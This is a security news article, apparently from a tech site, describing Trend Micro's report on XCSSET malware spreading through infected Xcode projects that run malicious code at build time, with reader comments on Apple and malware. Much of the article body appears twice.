New Mac malware infects and spreads via Xcode projects
A number of Xcode projects have been found to contain malware that can attack Safari and other browsers, security researchers have revealed, with the discovery of XCSSET malware making its way into Mac software projects through largely unknown means.
Researchers at Trend Micro discovered what the company describes as "an unusual infection related to Xcode developer projects," where malware would incorporate itself into the project itself. The malware was found to have multiple payload possibilities, and though it poses a potential risk to end users using software developed via Apple's IDE, it actually seems to be a bigger issue for the developers themselves.
The malware, which is part of the XCSSET family, was found to incorporate files that suggested it would enable a "command and control" of a target system, namely that it would allow the attacker using the malware to take control of the infected Mac. This can allow for a wide variety of actions to be performed on infected systems, including acquiring personal data and performing a ransomware-style attack involving encryption.
The team suggests the unusual nature of the malware is from how it is being distributed, namely that it is being "injected into local Xcode projects so that when the project is built, the malicious code is run." It is unclear exactly how the code is being injected into the project at this time.
For developers who rely on collaborating with others, Trend Micro suggests the threat is worse when taking into account projects being shared via GitHub and other code repositories, as this could lead to "a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects."
After being installed, the malware is able to attack Safari and other browsers on the Mac to acquire useful user data. Zero-day vulnerabilities discovered include an issue with Data Vault that bypasses macOS' System Integrity Protection feature, as well as in Safari for WebKit Development that creates a fake Safari app that runs instead of the legitimate version.
So far, the malware has only been found in two Xcode projects in research so far, with the projects thought not to be widely used by other developers, severely limiting the impact. A list of 380 victim IP addresses were collected by malware authors, with the vast bulk of infections made up of Macs in China and India.
Trend Micro recommends that project owners "continue to triple-check the integrity of their projects in order to definitely nip unwarranted problems such as a malware infection in the future."
Researchers at Trend Micro discovered what the company describes as "an unusual infection related to Xcode developer projects," where malware would incorporate itself into the project itself. The malware was found to have multiple payload possibilities, and though it poses a potential risk to end users using software developed via Apple's IDE, it actually seems to be a bigger issue for the developers themselves.
The malware, which is part of the XCSSET family, was found to incorporate files that suggested it would enable a "command and control" of a target system, namely that it would allow the attacker using the malware to take control of the infected Mac. This can allow for a wide variety of actions to be performed on infected systems, including acquiring personal data and performing a ransomware-style attack involving encryption.
The team suggests the unusual nature of the malware is from how it is being distributed, namely that it is being "injected into local Xcode projects so that when the project is built, the malicious code is run." It is unclear exactly how the code is being injected into the project at this time.
For developers who rely on collaborating with others, Trend Micro suggests the threat is worse when taking into account projects being shared via GitHub and other code repositories, as this could lead to "a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects."
After being installed, the malware is able to attack Safari and other browsers on the Mac to acquire useful user data. Zero-day vulnerabilities discovered include an issue with Data Vault that bypasses macOS' System Integrity Protection feature, as well as in Safari for WebKit Development that creates a fake Safari app that runs instead of the legitimate version.
So far, the malware has only been found in two Xcode projects in research so far, with the projects thought not to be widely used by other developers, severely limiting the impact. A list of 380 victim IP addresses were collected by malware authors, with the vast bulk of infections made up of Macs in China and India.
Trend Micro recommends that project owners "continue to triple-check the integrity of their projects in order to definitely nip unwarranted problems such as a malware infection in the future."
Comments
Beginning to look like an all out war on Apple because Apple chose to finally dump intel
Of course, I’m just a conspiracy theorist.....
TSMC decided to stop selling to Chinese firms, and so people left (or were poached)
XCode Malware has more to do with downloading unverified XCode projects. Probably via tutorial website. Considering most infections are in India & China.
Anti-trust cases are absolutely deserved. I should be able to decide what apps I install on MY phone, not Apple.
Dump Intel, yeah I doubt that. Maybe some fanboys and creative people will buy ARM. Rest of us, ain't touching it with a stick.
It's just that Apple has become the big boy now and so it's getting attention. The iPhone just got owned recently. Including it's so called "secure enclave"
NO one on earth cares about Intel CPUs.
And pay the price in malware.
Malware is a pretty broad category from simply scamming an ad network (adware), to irritating pop-up stuff to truly malicious, but still I've not ever encountered it in any form on any device I've used since buying the Verizon Droid 11 years ago, nor has any of my immediate family and the dozen+ devices purchased. TBH I've not ever heard of anyone I personally know encountering any truly malicious malware, with the worst I have knowledge of being a single piece of adware someone I knew had found some years ago and yes that was pretty irritating.
Android malware is really not at all common, and actually harmful stuff exceedingly rare to the point it essentially doesn't exist as a menace to the vast majority of users. Our 2 primary mobile OS'es are very secure, and viruses like those found on desktop systems don't even exist.
On the other hand it may reinforce Apple's assertion that a regulated App Store is the only way to ensure that virus and worms don't get into third party apps.
Edit: Huh. Refresh the page and it shows properly. That’s still a bug, though, like all the “breaks autocomplete/autocorrect” bugs on new lines.
Trend Micro recommends that project owners "continue to triple-check the integrity of their projects in order to definitely nip unwarranted problems such as a malware infection in the future."